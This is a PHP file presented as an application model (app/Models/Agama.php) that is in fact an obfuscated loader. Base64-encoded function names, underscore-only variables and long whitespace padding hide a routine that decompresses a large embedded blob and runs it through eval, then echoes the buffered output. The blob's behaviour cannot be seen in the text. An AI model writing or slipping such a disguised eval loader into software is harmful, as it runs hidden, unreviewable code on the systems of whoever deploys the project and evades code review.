<?php 
        $__='printf';$_='Loading app/Models/Agama.php';
        



















































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































                                                                                                                                                                                                                     $________;
